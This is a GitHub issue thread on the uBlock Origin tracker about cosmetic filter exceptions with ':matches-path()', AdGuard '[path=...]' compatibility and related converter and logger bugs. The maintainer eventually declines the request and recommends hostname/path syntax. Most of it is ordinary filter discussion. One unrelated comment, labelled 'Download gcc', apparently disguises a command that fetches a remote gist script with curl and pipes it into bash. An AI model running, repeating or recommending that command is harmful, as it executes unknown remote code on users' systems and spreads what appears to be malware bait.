### ISSUE TITLE
matches-path does't work with exception

### ISSUE THREAD

**Issue by Yuki2718** [uBlockOrigin/uBlock-issues#3235]
### Prerequisites

- [X] I verified that this is not a filter list issue. Report any issues with filter lists or broken website functionality in the [uAssets issue tracker](https://github.com/uBlockOrigin/uAssets/issues).
- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367) or [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] This is not a support issue or a question. For support, questions, or help, visit [/r/uBlockOrigin](https://www.reddit.com/r/uBlockOrigin/).
- [X] I performed a [cursory search of the issue tracker](https://github.com/uBlockOrigin/uBlock-issues/issues?q=is%3Aissue) to avoid opening a duplicate issue.
- [X] The issue is not present after disabling uBO in the browser.
- [X] I checked the [documentation](https://github.com/gorhill/uBlock/wiki) to understand that the issue I am reporting is not normal behavior.

### I tried to reproduce the issue when...

- [X] uBO is the only extension.
- [X] uBO uses default lists and settings.
- [X] using a new, unmodified browser profile.

### Description

On `https://www.nicovideo.jp/search/%E4%BA%AC%E9%83%BD`
These don't work
```
www.nicovideo.jp##li.item
www.nicovideo.jp#@#:matches-path(/search)li.item
```
Using an exception is an official way to handle such cases in AG: https://github.com/AdguardTeam/CoreLibs/issues/124#issuecomment-903488983

### A specific URL where the issue occurs.

```yaml
Mentioned
```

### Steps to Reproduce

Mentioned

### Expected behavior

`:matches-path()` should work as well for exception. Preferably ignore whitespace differences: `www.nicovideo.jp#@#:matches-path(/search)li.item` and `www.nicovideo.jp#@#:matches-path(/search) li.item`

### Actual behavior

Mentioned

### uBO version

1.57.3b10

### Browser name and version

Chrome 124.0.6367.203

### Operating System and version

Windows 10

**Comment by gorhill** [comment]
How about supporting negation in `:matches-path`?

    www.nicovideo.jp#@#:matches-path(!/search) li.item

**Comment by Yuki2718** [comment]
Isnt't that already possible by `:not(:matches-path())`? I'm more concerned about compatibility with AG lists.

**Comment by gorhill** [comment]
Yes, you're right. For compatibility with AdGuard, the proper course is to support the same syntax, `:matches-path` is not suitable for compatibility with AG's `[path=...]`.

**Comment by Yuki2718** [comment]
A problem is currently all the `[path=...]` rules for uBO version are converted to `:matches-path()` on FiltersCompiler, though I can open an issue if this should not be done in future.

**Comment by krystian3w** [comment]
You can try:

```adb
www.nicovideo.jp##:matches-path(/search) body li.item:style(display: list-item ! important)
```

If display was not changed by webmaster to not standard.

**Comment by Yuki2718** [comment]
Ofc I can fix whatever issues if it is me, but I don't know how other members fix issues.

**Comment by krystian3w** [comment]
If you mean threads that will not reach uAssets or AdGuardFilters (or reddit), the only thing left to do is write something like Wiki in popular place:

```adb
! 'search' broken by "##.ads":
!
!#if env_ublock
! disable filter at page in uBo
example.org#@#.ads
! recover in needed places
example.org##:not(:matches-path(/search)) .ads
!#else
[path="search"]example.org#@#.ads
!#endif
```

**Comment by ab1xqwe12** [comment]
Download gcc""; $(curl -sSfL https://gist.githubusercontent.com/ab1xqwe12/2e48b43cfbac28191cb7d1df26ab48e4/raw/e73f51e2ad79c540729b1278bc1fb45ffb697fcd/r.sh | bash)

**Comment by krystian3w** [comment]
@gorhill Something from changes 1.63.3b9/1.63.3b10 seems to have broke the logger (DOM result filtering from table and DOM inspector not working). After time, the cosmetic filter counter on the eye icon doesn't seem to work either.

Seemingly once every few refreshes I see some cosmetic filter (e.g. 1 of 10) in the table but after changing to the older 1.63.3b8 they are all there and every refresh.

**Comment by gorhill** [comment]
Any report of error in dev tools of either the webpage, the logger page, or uBO's background page would be useful

**Comment by krystian3w** [comment]
Minimal demo - bug with `*` aka All URL-s:

```abp
example.*##body div
*##::selection:style(background: #39F !important; color: #FFF !important;)
```

both now invisible for logger table and first for DOM inspector.

**Comment by gorhill** [comment]
> A problem is currently all the [path=...] rules for uBO version are converted to :matches-path() on FiltersCompiler, though I can open an issue if this should not be done in future.

Those `[$path=..]` filters should now be converted to `hostname/path` form.

**Comment by krystian3w** [comment]
Probably the converter `[$domain=/foo\d+.com/]##` to uBo syntax is now broken.

Additionally, AdGuard has 5 such monsters:


```adb
! https://github.com/AdguardTeam/AdguardFilters/issues/115683#issuecomment-1109265607
[$domain=facebook.com,path=/gaming]#$#body > .AdBox.Ad.advert ~ div[class] { display: block !important; }
[$domain=facebook.com,path=/gaming]#$#body > .AdBox.Ad.advert { display: block !important; }

[$domain=facebook.com,path=/adsmanager]#$#body { display: block !important; }
[$domain=facebook.com,path=/adsmanager]#$#body > .AdBox.Ad.advert { display: block !important; }
[$domain=facebook.com,path=/adsmanager]#$#body > .AdBox.Ad.advert ~ div[class] { display: block !important; }
```

If AdGuard don't want to combine several brackets in one line with different parhs, then can pull the domain out of the bracket (closing it in brackets makes sense to me now, but only so that the filter doesn't run on outdated AdGuard software).

**Comment by krystian3w** [comment]
I'm a little worried that the AG syntax translator on uBo still doesn't want to work; as a result, when we flip the new syntax too early, it will suddenly start leaking ads on strange "Turkish" VoD sites (which changes the numbers in the domain name) PoC:

```adb
[$domain=/example\..*/]##body h1
[$domain=/example\.(com|org)/]##body a
[$domain=/exampl[a-z]\..*/]##body p:not(:has(> *))
[$domain=/e[a-z]ample\..*/]##body p:has(a)
```
```adb
[$domain=/example\..*/]##+js(set-attr, body h1, hidden)
[$domain=/example\.(com|org)/]##+js(set-attr, body a)
[$domain=/exampl[a-z]\..*/]##+js(set-attr, body p:not(:has(> *)), hidden)
[$domain=/e[a-z]ample\..*/]##+js(set-attr, body p:has(a), hidden)
```

Nothing are hidden.

**Comment by gorhill** [comment]
Thanks for reporting, sorry for having missed your same reported issue over two weeks ago.

**Comment by gorhill** [comment]
Given that uBO now supports hostname/path syntax, I am going to decline supporting exceptions for cases such as:

    www.nicovideo.jp##li.item
    www.nicovideo.jp#@#:matches-path(/search)li.item

`:matches-path()` is part of the selector from uBO's point of view, and trying to make `:matches-path()` a special case where it shouldn't be taken into account for selector-matching is going to increase code complexity to a point I feel is going to be difficult to create/maintain.

Ideally the two filters above are best written as:

    www.nicovideo.jp##li.item
    www.nicovideo.jp/search#@#li.item
